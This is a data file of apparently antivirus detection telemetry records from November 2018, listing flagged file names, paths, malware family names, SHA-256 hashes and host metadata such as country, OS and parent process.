  Row(detection=Row(filename='dd6d2263d3262b60fe6e2a0be799ed305ae3a09787cb8a6182fbeb48e4c630b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\DD6D2263D3262B60FE6E2A0BE799ED305AE3A09787CB8A6182FBEB48E4C630B9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='dd6d2263d3262b60fe6e2a0be799ed305ae3a09787cb8a6182fbeb48e4c630b9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:12:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094936-39eba5bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094936-39EBA5BD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='symsilent.pif', filepath='C:\\Users\\X\\Symantec\\SymSilent\\SymSilent.pif', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='termoidraulici ed elettrici.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede ultime APRILE 2016\\termoidraulici ed elettrici.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095259-60bf111e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095259-60BF111E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:53:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bb24f754e5fcfde6f25ec9ec7acb606f75ec2122b50cd73a8bf0592b320c0c01', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BB24F754E5FCFDE6F25EC9EC7ACB606F75EC2122B50CD73A8BF0592B320C0C01', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bb24f754e5fcfde6f25ec9ec7acb606f75ec2122b50cd73a8bf0592b320c0c01', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-215641-77d6ddf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215641-77D6DDF1', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:56:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T20:22:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='moviemk.exe', filepath='F:\\Backup Server+Salpa\\My Doc\\Program Files\\Movie Maker\\moviemk.exe', filesize=3584000, name='W32/Virut.Gen.#M1.#R1'), hash='851da0950079375ea73c322500e5f7ef265ca32057240bea7ce799794884d68c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:33:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='449bb00b4cfac82b665cb2352cacf6166a7652303fa7e83dbb6d1183c34a3280', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=484352, timestamp='2018-11-04T11:15:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131027-3cdfe916', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ee14c03\\AVSCAN-20181104-130740-20707A78\\AVSCAN-20181104-131027-3CDFE916', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='003ba151219f945cb613302233617c71dbf7754e1527a1430de85cb1ac4d433f', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:10:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\新增資料夾\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msn.exe', filepath='\\\\?\\C:\\win\\msn.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:44:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe26_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe26 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T03:53:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zybkeh[1].jpg', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\CB09OH83\\zybkeh[1].jpg', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:47:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='trz90c2.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\trz90C2.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='8d0a02568bf420ae58133d4123c871202d90509559e77fec64a24db85d4cf0a0', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:22:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153730-daf6cd00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-153730-DAF6CD00', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:37:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122647-df98e5ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-122647-DF98E5EA', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='axdist.exe', filepath='H:\\ISMAIL 2018.11.4\\Popular software26.4.17\\Corel Draw 9\\Config\\Redist\\Axdist.exe', filesize=832000, name='W32/Chir.B.#M1.#R1'), hash='727ea988d5644f3a28f7531a3312389090ffe67d6d9c021d1cd10a9577a41c0c', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=17760, timestamp='2018-11-04T10:23:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151805-7b5ac87d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b490ecb4\\AVSCAN-20181104-150815-28F17862\\AVSCAN-20181104-151805-7B5AC87D', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='9ed2e3bac10b5c44b5b3a4eadc9b057fc1c98cf00570e49e09806712625f0c3f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:19:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132509-564ab99c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132509-564AB99C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sm_sr.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsk6CF6.tmp\\SM_SR.dll', filesize=1952000, name='Adware/Widgi.vqxpa.#M1.#R1'), hash='592b7d066b4a229f997bf6ab2da7137333d44655d716c292bf8a9dfc2f474e57', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T01:31:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232135-11cd2f40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24ba8b03\\AVSCAN-20181104-232121-0EBD4790\\AVSCAN-20181104-232135-11CD2F40', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:21:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240f3', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240f3', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:44:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093958-5a777003', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32ac157d\\AVSCAN-20181104-093944-5765968D\\AVSCAN-20181104-093958-5A777003', filesize=13120000, name='HEUR/AGEN.1033252.#M1.#R1'), hash='2fceedab18e5468969fc4112ba2f5b78caf66cbaa0db75bf9779955a54076c32', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:39:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='aa1af21a06a3b7d53ecdfeffed1d395241d8b0eeb82ed7a49deb9792ad0942e8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AA1AF21A06A3B7D53ECDFEFFED1D395241D8B0EEB82ED7A49DEB9792AD0942E8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aa1af21a06a3b7d53ecdfeffed1d395241d8b0eeb82ed7a49deb9792ad0942e8', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:46:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8c3c', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8c3c', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:33:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jerusalem.november_30th.exe', filepath='C:\\Users\\X\\Desktop\\6000 Virus Collection IrFan_1933 or XyberDexstop\\() --- ()\\DANGEROUS (Fvck1933)\\jerusalem.november_30th.exe', filesize=12000, name='Nov30.#M1.#R1'), hash='9da8699ce85f97347bb6c9c6b1f1d7bcb0e6d696784f598895997fe7c3d72edc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:35:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:03:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ewogxhf.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ewogxhf.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0d299e2f10838d95aea903ad8570e2add8321f78d88f18987c01407de7f8861b', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:13:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cosmicbugs.exe', filepath='D:\\العاب\\small games\\Cosmic Bugs\\cosmicbugs.exe', filesize=192000, name='W32/Jeefo.A.#M1.#R1'), hash='60b38631fb18adfdc261bf0fefebe3d3a01869c60e5c34dbe648b1ee5fa55dfa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.exe', parentsize=36352, timestamp='2018-11-04T12:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rad9d3ac.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\rad9D3AC.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='africa new.exe', filepath='D:\\Disque amovible\\AFRICA NEW.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093043-aba9c042', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23d9098e\\AVSCAN-20181104-091720-4E8FDD76\\AVSCAN-20181104-093043-ABA9C042', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:30:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\w3ogjzuxheq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:15:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:55:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f_0011d9', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_0011d9', filesize=280000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='250aefbe78bbe28af33fae3dbd7d72e97674c34c30613a8566a819b7ba7cd460', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T20:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221422-7b2d48a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221422-7B2D48A7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dictedit.exe', filepath='C:\\Program Files (x86)\\PRMT8\\ALPHA\\DictEdit.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='2863d1b95f79d498b45b191403869b205a506c5c1caea03db78e1b18d394f853', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:07:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:04:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:11:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:12:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='silhouette studiosrv.exe', filepath='E:\\PORTABLE Software\\Silhouette America\\Silhouette Studio\\Silhouette StudioSrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:21:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='african farm.exe', filepath='E:\\العاب\\African Farm\\African Farm.exe', filesize=2368000, name='W32/Sality.AT.#M1.#R1'), hash='77fab084931064bb1820d011cdad9ab3772cb2cf72d0237318dd3e0f32f7f0db', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:08:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='MM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chromepass.exe', filepath='B:\\Software\\2018-11-04\\_Mini\\_Sammlungen\\PCW\\Center\\Apps\\_Nirsoft\\Passwords_Chrome\\ChromePass.exe', filesize=128000, name='APPL/ChromePassV.1.#M1.#R1'), hash='dbfa10a7deeb6d1ac8fd95ffeb23b87adc58e6388e522812fabe7f710e3cdd89', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lupinho.Net\\HardlinkBackup\\HardlinkBackup.Service.exe', parentsize=17408, timestamp='2018-11-04T08:48:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T15:15:24Z'), dt=datetime.date(2018, 11, 4)),
